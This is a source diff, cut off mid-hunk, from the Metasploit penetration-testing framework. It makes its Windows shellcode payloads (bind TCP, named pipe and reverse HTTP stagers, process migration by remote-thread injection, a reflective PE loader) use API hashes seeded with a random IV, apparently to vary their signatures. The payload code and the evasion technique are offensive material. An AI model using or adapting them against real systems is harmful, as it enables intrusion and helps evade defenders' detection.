diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 2ae1b7ccb5304..9371e011dcc2e 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -84,7 +84,18 @@ def replace_var(raw, name, offset, pack) method = datastore[name] method = 'thread' if (!method or @@exit_types.include?(method) == false) - raw[offset, 4] = [ @@exit_types[method] ].pack(pack || 'V') + if respond_to?(:block_api_hash) + exit_hash = block_api_hash('kernel32.dll', { + 'seh' => 'SetUnhandledExceptionFilter', + 'thread' => 'ExitThread', + 'process' => 'ExitProcess', + 'none' => 'GetLastError' + }[method]).to_i(16) + else + exit_hash = @@exit_types[method] + end + + raw[offset, 4] = [ exit_hash ].pack(pack || 'V') return true end @@ -112,6 +123,7 @@ def handle_intermediate_stage(conn, payload) # data into a buffer which is allocated with VirtualAlloc to avoid running # out of stack space or NX problems. # See the source file: /external/source/shellcode/windows/midstager.asm + # TODO: We should update the midstager to use block-api randomization (passing it to metasm, and block api...) midstager = "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" + "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" + diff --git a/lib/msf/core/payload/windows/bind_named_pipe.rb b/lib/msf/core/payload/windows/bind_named_pipe.rb index e78a00bb0f85c..b06e21f71ad2f 100644 --- a/lib/msf/core/payload/windows/bind_named_pipe.rb +++ b/lib/msf/core/payload/windows/bind_named_pipe.rb @@ -118,7 +118,7 @@ def asm_send_uuid(uuid=nil) db #{raw_to_db(uuid_raw)} ; lpBuffer get_uuid_address: push edi : hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} + push #{block_api_hash('kernel32.dll', 'WriteFile')} call ebp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten) ^ end @@ -154,7 +154,7 @@ def asm_bind_named_pipe(opts={}) call get_pipe_name ; lpName db "#{full_pipe_name}", 0x00 get_pipe_name: - push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')} + push #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')} call ebp ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize, ; nInBufferSize, nDefaultTimeOut, lpSecurityAttributes) mov edi, eax ; save hPipe (using sockedi convention) @@ -171,11 +171,11 @@ def asm_bind_named_pipe(opts={}) connect_pipe: push 0 ; lpOverlapped push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')} + push #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')} call ebp ; ConnectNamedPipe(hPipe, lpOverlapped) ; check for failure - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')} + push #{block_api_hash('kernel32.dll', 'GetLastError')} call ebp ; GetLastError() cmp eax, 0x217 ; looking for ERROR_PIPE_CONNECTED jz get_stage_size ; success @@ -184,7 +184,7 @@ def asm_bind_named_pipe(opts={}) ; wait before trying again push #{retry_wait} - push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + push #{block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep(millisecs) jmp connect_pipe ^ @@ -202,7 +202,7 @@ def asm_bind_named_pipe(opts={}) push 0 ; lpMaxCollectionCount push ecx ; lpMode (PIPE_WAIT) push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} + push #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} call ebp ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout) ^ end @@ -217,7 +217,7 @@ def asm_bind_named_pipe(opts={}) lea ecx, [esp+16] ; lpBuffer push ecx push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped) pop eax ; lpNumberOfBytesRead pop esi ; lpBuffer (stage size) @@ -238,7 +238,7 @@ def asm_bind_named_pipe(opts={}) push 0x1000 ; MEM_COMMIT push esi ; dwLength push 0 ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE) ^ @@ -267,7 +267,7 @@ def asm_bind_named_pipe(opts={}) push edx ; nNumberOfBytesToRead push ebx ; lpBuffer push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped) pop edx ; lpNumberOfBytesRead ^ @@ -283,13 +283,13 @@ def asm_bind_named_pipe(opts={}) push 0x8000 ; MEM_RELEASE push 0 ; dwSize, 0 to decommit whole block push ecx ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_RELEASE) cleanup_file: ; cleanup the pipe handle push edi ; file handle - push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + push #{block_api_hash('kernel32.dll', 'CloseHandle')} call ebp ; CloseHandle(hPipe) jmp failure @@ -319,14 +319,14 @@ def asm_bind_named_pipe(opts={}) call get_kernel32_name db "kernel32", 0x00 get_kernel32_name: - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')} + push #{block_api_hash('kernel32.dll', 'GetModuleHandleA')} call ebp ; GetModuleHandleA("kernel32") call get_exit_name db "ExitThread", 0x00 get_exit_name: ; lpProcName push eax ; hModule - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} + push #{block_api_hash('kernel32.dll', 'GetProcAddress')} call ebp ; GetProcAddress(hModule, "ExitThread") push 0 ; dwExitCode call eax ; ExitProcess(0) diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb index 4dc52a96ae4ec..642db625c75ed 100644 --- a/lib/msf/core/payload/windows/bind_tcp.rb +++ b/lib/msf/core/payload/windows/bind_tcp.rb @@ -121,14 +121,14 @@ def asm_bind_tcp(opts={}) push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. push 0x5F327377 ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); push 11 @@ -144,7 +144,7 @@ def asm_bind_tcp(opts={}) ; we do not specify a protocol [5] push 1 ; push SOCK_STREAM push #{addr_fam} ; push AF_INET/6 - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -155,7 +155,7 @@ def asm_bind_tcp(opts={}) push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used) push esi ; pointer to the sockaddr_in struct push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + push #{block_api_hash('ws2_32.dll', 'bind')} call ebp ; bind( s, &sockaddr_in, 16 ); ^ @@ -170,18 +170,18 @@ def asm_bind_tcp(opts={}) asm << %Q^ ; backlog, pushed earlier [3] push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')} + push #{block_api_hash('ws2_32.dll', 'listen')} call ebp ; listen( s, 0 ); ; we set length for the sockaddr struct to zero, pushed earlier [2] ; we dont set the optional sockaddr param, pushed earlier [1] push edi ; listening socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')} + push #{block_api_hash('ws2_32.dll', 'accept')} call ebp ; accept( s, 0, 0 ); push edi ; push the listening socket xchg edi, eax ; replace the listening socket with the new connected socket for further comms - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket( s ); ^ @@ -204,7 +204,7 @@ def asm_block_recv(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ @@ -223,7 +223,7 @@ def asm_block_recv(opts={}) push 0x1000 ; MEM_COMMIT push esi ; push the newly received second stage length. push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... xchg ebx, eax ; ebx = our new memory address for the new stage @@ -233,7 +233,7 @@ def asm_block_recv(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -261,7 +261,7 @@ def asm_block_recv(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end diff --git a/lib/msf/core/payload/windows/bind_tcp_rc4.rb b/lib/msf/core/payload/windows/bind_tcp_rc4.rb index 49dc042112a6c..6394d184cd3fd 100644 --- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb +++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb @@ -61,7 +61,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ @@ -83,7 +83,7 @@ def asm_block_recv_rc4(opts={}) ; push esi ; push the newly received second stage length. push ecx ; push the alloc length push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box @@ -96,7 +96,7 @@ def asm_block_recv_rc4(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -138,7 +138,7 @@ def asm_block_recv_rc4(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end diff --git a/lib/msf/core/payload/windows/block_api.rb b/lib/msf/core/payload/windows/block_api.rb index 447efe139e6e4..8100f1ede3c31 100644 --- a/lib/msf/core/payload/windows/block_api.rb +++ b/lib/msf/core/payload/windows/block_api.rb @@ -10,12 +10,32 @@ module Msf ### module Payload::Windows::BlockApi + @block_api_iv = nil + + def block_api_iv(opts={}) + @block_api_iv ||= rand(0x100000000) + end + def asm_block_api(opts={}) - Rex::Payloads::Shuffle.from_graphml_file( + asm = Rex::Payloads::Shuffle.from_graphml_file( File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'), arch: ARCH_X86, name: 'api_call' ) + iv = opts.fetch(:block_api_iv) { block_api_iv } + # Patch the assembly to set the correct IV + # db 0xbf, 0x00, 0x00, 0x00, 0x00 => mov edi, + iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ') + unless asm.include?("db 0xbf, 0x00, 0x00, 0x00, 0x00") + raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})" + end + asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}") + asm + end + + def block_api_hash(mod, func, opts={}) + iv = opts.fetch(:block_api_iv) { block_api_iv } + Rex::Text.block_api_hash(mod, func, iv: iv) end end diff --git a/lib/msf/core/payload/windows/exitfunk.rb b/lib/msf/core/payload/windows/exitfunk.rb index 92ae5ca0e4faa..d3dd32effd9da 100644 --- a/lib/msf/core/payload/windows/exitfunk.rb +++ b/lib/msf/core/payload/windows/exitfunk.rb @@ -18,7 +18,7 @@ def asm_exitfunk(opts={}) when 'seh' asm << %Q^ - mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')} push.i8 0 ; push the exit function parameter push ebx ; push the hash of the exit function call ebp ; SetUnhandledExceptionFilter(0) @@ -32,14 +32,14 @@ def asm_exitfunk(opts={}) when 'thread' asm << %Q^ - mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)} - push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} + push #{block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) call ebp ; GetVersion(); (AL will = major version and AH will = minor version) cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7 jl exitfunk_goodbye ; Then just call the exit function... cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... jne exitfunk_goodbye ; - mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread + mov ebx, #{block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread exitfunk_goodbye: ; We now perform the actual call to the exit function push.i8 0 ; push the exit function parameter push ebx ; push the hash of the exit function @@ -48,7 +48,7 @@ def asm_exitfunk(opts={}) when 'process', nil asm << %Q^ - mov ebx, 0x#{Msf::Payload::Windows.exit_types['process'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitProcess')} push.i8 0 ; push the exit function parameter push ebx ; push the hash of the exit function call ebp ; ExitProcess(0) @@ -56,7 +56,7 @@ def asm_exitfunk(opts={}) when 'sleep' asm << %Q^ - mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov ebx, #{block_api_hash('kernel32.dll', 'Sleep')} push 300000 ; 300 seconds push ebx ; push the hash of the function call ebp ; Sleep(300000) diff --git a/lib/msf/core/payload/windows/migrate_common.rb b/lib/msf/core/payload/windows/migrate_common.rb index 8253d6efdaa5c..3a0eb18b746d3 100644 --- a/lib/msf/core/payload/windows/migrate_common.rb +++ b/lib/msf/core/payload/windows/migrate_common.rb @@ -31,7 +31,7 @@ def generate(opts={}) #{generate_migrate(opts)} signal_event: push dword [esi] ; Event handle is pointed at by esi - push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + push #{block_api_hash('kernel32.dll', 'SetEvent')} call ebp ; SetEvent(handle) call_payload: call dword [esi+8] ; Invoke the associated payload diff --git a/lib/msf/core/payload/windows/migrate_named_pipe.rb b/lib/msf/core/payload/windows/migrate_named_pipe.rb index 59817f553a001..1d4ee7cb7d3fd 100644 --- a/lib/msf/core/payload/windows/migrate_named_pipe.rb +++ b/lib/msf/core/payload/windows/migrate_named_pipe.rb @@ -32,7 +32,7 @@ def generate_migrate(opts = {}) mov edi, [esi+16] ; The duplicated pipe handle is in the migrate context. signal_pipe_event: push dword [esi] ; Event handle is pointed at by esi - push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + push #{block_api_hash('kernel32.dll', 'SetEvent')} call ebp ; SetEvent(handle) call_pipe_payload: call dword [esi+8] ; call the associated payload diff --git a/lib/msf/core/payload/windows/migrate_tcp.rb b/lib/msf/core/payload/windows/migrate_tcp.rb index 664ba82c7b280..34277b11848c3 100644 --- a/lib/msf/core/payload/windows/migrate_tcp.rb +++ b/lib/msf/core/payload/windows/migrate_tcp.rb @@ -34,14 +34,14 @@ def generate_migrate(opts={}) push '32' push 'ws2_' push esp ; pointer to 'ws2_32' - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA('ws2_32') init_networking: mov eax, #{WSA_VERSION} ; EAX == version, and is also used for size sub esp, eax ; allocate space for the WSAData structure push esp ; Pointer to the WSAData structure push eax ; Version required - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup(Version, &WSAData) create_socket: push eax ; eax is 0 on success, use it for flags @@ -53,7 +53,7 @@ def generate_migrate(opts={}) push eax ; SOCK_STREAM inc eax push eax ; AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0) xchg edi, eax ^ diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb index 0c00d6c554264..8acc2208592db 100644 --- a/lib/msf/core/payload/windows/prepend_migrate.rb +++ b/lib/msf/core/payload/windows/prepend_migrate.rb @@ -70,21 +70,21 @@ def prepend_migrate(buf) exitblock = %Q^ ;sleep push -1 - push #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) call ebp ; Sleep( ... ); ^ # Check to see if we can find exitfunc in the payload exitfunc_block_asm = %Q^ exitfunk: - mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread - push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) + mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread + push #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) call ebp ; GetVersion(); (AL will = major version and AH will = minor version) cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7 jl goodbye ; Then just call the exit function... cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... jne goodbye ; - mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function + mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function goodbye: push 0x0 ; push the exit function parameter push ebx ; push the hash of the exit function @@ -135,7 +135,7 @@ def prepend_migrate(buf) add esp,-400 ; adjust the stack to avoid corruption lea edx,[esp+0x60] push edx - push #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) call ebp ; GetStartupInfoA( &si ); lea eax,[esp+0x60] ; Put startupinfo pointer back in eax @@ -158,7 +158,7 @@ def prepend_migrate(buf) push esi ; lpCommandLine push ebx ; lpApplicationName - push #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) call ebp ; CreateProcessA( &si ); ; if we didn't get a new process, use this one @@ -186,7 +186,7 @@ def prepend_migrate(buf) xor ebx,ebx push ebx ; address push [edi] ; handle - push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) call ebp ; VirtualAllocEx( ...); ; eax now contains the destination @@ -198,7 +198,7 @@ def prepend_migrate(buf) begin_of_payload_return: ; lpBuffer push eax ; lpBaseAddress push [edi] ; hProcess - push #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) call ebp ; WriteProcessMemory( ...) ; run the code (CreateRemoteThread()) @@ -210,7 +210,7 @@ def prepend_migrate(buf) push ebx ; stacksize push ebx ; lpThreadAttributes push [edi] - push #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) call ebp ; CreateRemoteThread( ...); #{exitblock} ; jmp to exitfunc or long sleep @@ -244,21 +244,21 @@ def prepend_migrate_64(buf) ;sleep xor rcx,rcx dec rcx ; rcx = -1 - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) call rbp ; Sleep( ... ); EOS exitfunc_block_asm = %Q^ exitfunk: - mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) + mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) call rbp ; GetVersion(); (AL will = major version and AH will = minor version) add rsp, 40 ; cleanup the default param space on stack cmp al, 0x6 ; If we are not running on Windows Vista, 2008 or 7 jl goodbye ; Then just call the exit function... cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... jne goodbye ; - mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread + mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread goodbye: ; We now perform the actual call to the exit function push 0x0 ; pop rcx ; set the exit function parameter @@ -311,7 +311,7 @@ def prepend_migrate_64(buf) ; get our own startupinfo at esp+0x60 add rsp,-400 ; adjust the stack to avoid corruption lea rcx,[rsp+0x30] - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) call rbp ; GetStartupInfoA( &si ); jmp getcommand @@ -333,7 +333,7 @@ def prepend_migrate_64(buf) mov r8, rcx ; lpProcessAttributes mov rdx, rsi ; lpCommandLine ; rcx is already zero ; lpApplicationName - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) call rbp ; CreateProcessA( &si ); ; if we didn't get a new process, use this one @@ -363,7 +363,7 @@ def prepend_migrate_64(buf) migrate_asm << <<-EOS xor rdx,rdx ; address mov rcx, [rdi] ; handle - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) call rbp ; VirtualAllocEx( ...); ; eax now contains the destination - save in ebx @@ -377,7 +377,7 @@ def prepend_migrate_64(buf) pop r8 ; lpBuffer mov rdx, rax ; lpBaseAddress mov rcx, [rdi] ; hProcess - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) call rbp ; WriteProcessMemory( ...); ; run the code (CreateRemoteThread()) @@ -389,7 +389,7 @@ def prepend_migrate_64(buf) mov r8, rcx ; stacksize ;rdx already equals 0 ; lpThreadAttributes mov rcx, [rdi] - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) call rbp ; CreateRemoteThread( ...); #{exitblock} ; jmp to exitfunc or long sleep diff --git a/lib/msf/core/payload/windows/reflective_pe_loader.rb b/lib/msf/core/payload/windows/reflective_pe_loader.rb index be7a3890562b6..d26291688c66c 100644 --- a/lib/msf/core/payload/windows/reflective_pe_loader.rb +++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb @@ -4,7 +4,6 @@ module Msf module Payload::Windows::ReflectivePELoader include Payload::Windows::BlockApi def asm_reflective_pe_loader(opts) - prologue = '' if opts[:is_dll] == true prologue = %( @@ -33,7 +32,7 @@ def asm_reflective_pe_loader(opts) push 0x103000 ; MEM_COMMIT | MEM_TOP_DOWN | MEM_RESERVE push dword [esp+12] ; dwSize push 0x00 ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE) push eax ; Save the new image base to stack xor edx,edx ; Zero out the edx @@ -129,7 +128,7 @@ def asm_reflective_pe_loader(opts) push ecx ; Save ecx to stack push edx ; Save edx to stack push eax ; Push the address of linrary name string - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" ) + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} ; ror13( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA([esp+4]) pop edx ; Retrieve edx pop ecx ; Retrieve ecx @@ -139,7 +138,7 @@ def asm_reflective_pe_loader(opts) push edx ; Save edx to stack push eax ; Push the address of proc name string push ebx ; Push the dll handle - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" ) + push #{block_api_hash('kernel32.dll', 'GetProcAddress')} ; ror13( "kernel32.dll", "GetProcAddress" ) call ebp ; GetProcAddress(ebx,[esp+4]) pop edx ; Retrieve edx pop ecx ; Retrieve ecx diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index a1155383b5660..dff1433393212 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -246,7 +246,7 @@ def asm_reverse_http(opts={}) push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... push esp ; Push a pointer to the "wininet" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wininet" ) xor ebx, ebx ; Set ebx to NULL to use in future arguments ^ @@ -285,7 +285,7 @@ def asm_reverse_http(opts={}) ^ end asm << %Q^ - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} + push #{block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ @@ -302,7 +302,7 @@ def asm_reverse_http(opts={}) db "#{opts[:url]}", 0x00 got_server_host: push eax ; HINTERNET hInternet (still in eax from InternetOpenA) - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} + push #{block_api_hash('wininet.dll', 'InternetConnectA')} call ebp mov esi, eax ; Store hConnection in esi ^ @@ -321,7 +321,7 @@ def 